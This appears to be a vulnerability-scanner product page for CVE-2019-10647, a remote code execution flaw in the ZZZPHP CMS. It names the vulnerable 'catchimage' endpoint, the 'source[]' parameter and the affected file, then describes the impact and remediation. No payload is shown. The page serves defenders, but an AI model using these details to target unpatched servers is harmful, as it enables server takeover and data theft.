CVE-2019-10647 Scanner
CVE-2019-10647 Scanner - Remote Code Execution (RCE) vulnerability in ZZZPHP
Short Info
Level
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 seconds
Time Interval
8 days 12 hours
Scan only one
Domain, Subdomain, IPv4
Toolbox
ZZZPHP is a web-based content management system designed for creating and managing websites. It is used by developers and web administrators to build dynamic websites with customizable features. The software is particularly popular among small to medium-sized businesses looking for an easy-to-use platform. ZZZPHP provides a range of plugins and extensions to enhance website functionality. Users benefit from the ability to manage site content, integrate multimedia elements, and improve site structure. As an open-source solution, ZZZPHP continuously attracts contributions from developers worldwide.
The Remote Code Execution (RCE) vulnerability in ZZZPHP arises due to inadequate restrictions on file handling operations in the software. This flaw allows attackers to inject and execute arbitrary PHP code within the system. By exploiting this vulnerability, attackers can remotely execute commands and scripts on the server without authentication. The vulnerability specifically targets the 'inc/zzz_file.php' file in the software. Ensuring about the critical nature, immediate remediation is advised to mitigate potential risks associated with this vulnerability.
The vulnerability leverages the 'plugins/ueditor/php/controller.php?action=catchimage' endpoint in ZZZPHP. Threat actors exploit this endpoint using a crafted URL, targeting the 'source[]' parameter to execute malicious PHP code. Upon successful exploitation, the server processes and executes the attacker-supplied PHP code, leading to potential complete server control. This technical flaw highlights a gap in proper user input validation and execution policy within the software. Proper patch management and input sanitization are essential to address this security concern.
If exploited, the RCE vulnerability can have significant impacts on the compromised server. Attackers can gain unauthorized access, exposing the server to data breaches and unauthorized data manipulations. Malicious entities could install backdoors or rootkits, further facilitating espionage or data exfiltration. Beyond data security risks, the compromised server might be used to launch further attacks against internal or external targets. Therefore, organizations need to act promptly to limit exposure and apply security measures to mitigate further risks.
REFERENCES
